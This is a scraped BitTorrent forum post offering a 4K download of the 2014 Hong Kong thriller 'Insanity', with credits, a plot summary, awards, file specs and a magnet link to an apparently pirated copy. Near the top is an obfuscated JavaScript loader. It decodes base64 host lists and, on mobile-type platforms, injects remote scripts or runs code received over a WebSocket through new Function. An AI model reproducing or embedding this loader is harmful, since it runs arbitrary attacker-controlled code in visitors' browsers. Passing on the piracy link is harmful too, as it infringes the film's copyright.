暴疯语.迅雷下载[WEB-MP4/8.35GB][4K-2160P]

版主小s 12天前 294

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 暴疯语 / Insanity

◎年 代 2014

◎产 地 中国大陆 / 中国香港

◎类 别 悬疑 / 惊悚

◎语 言 汉语普通话 / 粤语

◎上映日期 2015-04-03(中国大陆) / 2014-11-19(台北金马影展)

◎IMDb链接 https://www.imdb.com/title/tt4305562/

◎豆瓣评分 5.9/10 (38713人评价)

◎豆瓣链接 https://movie.douban.com/subject/25742299/

◎片 长 99分钟

◎导 演 李光耀 David Lee Kwong-Yiu (id:1335186)

◎编 剧 李光耀 David Lee Kwong-Yiu (id:1335186)

吕冠南 Koon-Nam Lui (id:1313441)

尔冬升 Tung-shing Yee (id:1274289)

◎演 员 刘青云 Sean Lau (id:1007251)

黄晓明 Xiaoming Huang (id:1041404)

方中信 Alex Fong (id:1033102)

薛凯琪 Fiona Sit (id:1023827)

鲍起静 Hee Ching Paw (id:1274229)

叶璇 Michelle Ye (id:1005537)

毛俊辉 Fredric Mao Chun-fai (id:1313966)

孙佳君 Paulyn Sun (id:1050664)

冼色丽 Seli Xian (id:1275651)

卫诗雅 Michelle Wai (id:1313357)

李国麟 Kwok-Lun Lee (id:1274575)

伍国明 Kwok-ming Ng (id:1359527)

王宜华 Chloe Wong (id:1380813)

陈郁宪 Donovan Chan (id:1417027)

黄焯言 Matthew Wong (id:1383010)

麦洛新 Lok San Mak (id:1373029)

林炳坤 Bingkun Lin (id:1350348)

钱荣威 Wing-Wai Chin (id:1418361)

陈志英 Chi Ying Chan (id:1326652)

张世宏 Silver Cheung (id:1318916)

黄国雄 Samuel Wong (id:1426248)

◎标 签 悬疑 / 香港 / 刘青云 / 香港电影 / 心理 / 剧情 / 2015 / 尔冬升

◎简 介

失业在家的范国生(刘青云 饰)残忍地杀害了妻子(叶璇 饰),这件事震惊了全香港,而他随后被诊断为有精神疾病而逃脱了法律制裁。医学才俊周明杰(黄晓明 饰)主动承担为范国生的主治医生,极力帮助其治疗。三年后,周明杰力保范国生出院,重回社会,这遭到了医学界的一致反对,但是周却执意坚持。可是新的毒贩凶杀案又接踵而来,警方又再次把目标锁定为范国生,与此同时,周明杰的未婚妻宝儿(薛凯琪 饰)遭遇了死亡威胁,强大的压力让周明杰无法喘息。如何拯救爱人,拯救事业?真相到底是什么?精神病人究竟能否被治愈?新一轮的自我救赎悄然开始。

◎获奖情况 (共5项)

第51届台北金马影展 (2014)

金马奖 最佳女配角(提名)

└──鲍起静 (id:1274229)

第34届香港电影金像奖 (2015)

最佳男主角(提名)

└──刘青云 (id:1007251)

最佳女配角(提名)

└──鲍起静 (id:1274229)

最佳原创电影歌曲(提名)

新晋导演

└──李光耀 (id:1335186)

General

Complete name : 暴疯语[email protected]

Format : MPEG-4

Format profile : Base Media

Codec ID : isom (isom/iso2/mp41)

File size : 8.35 GiB

Duration : 1 h 38 min

Overall bit rate : 12.2 Mb/s

Writing application : Lavf58.32.104

Video

ID : 1

Format : HEVC

Format/Info : High Efficiency Video Coding

Format profile : [email protected]@High

Codec ID : hev1

Codec ID/Info : High Efficiency Video Coding

Duration : 1 h 38 min

Bit rate : 12.0 Mb/s

Width : 3 840 pixels

Height : 1 592 pixels

Display aspect ratio : 2.40:1

Frame rate mode : Constant

Frame rate : 24.000 FPS

Color space : YUV

Chroma subsampling : 4:2:0

Bit depth : 8 bits

Bits/(Pixel*Frame) : 0.082

Stream size : 8.21 GiB (98%)

Codec configuration box : hvcC

Audio

ID : 2

Format : AAC LC

Format/Info : Advanced Audio Codec Low Complexity

Codec ID : mp4a-40-2

Duration : 1 h 38 min

Bit rate mode : Constant

Bit rate : 192 kb/s

Channel(s) : 2 channels

Channel layout : L R

Sampling rate : 44.1 kHz

Frame rate : 43.066 FPS (1024 SPF)

Compression mode : Lossy

Stream size : 133 MiB (2%)

Default : Yes

Alternate group : 1


TAGS 惊悚 悬疑

磁力链:
  • magnet:?xt=urn:btih:4CC4A0A783372688FBB97B7F00B94E7B031B7A64
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回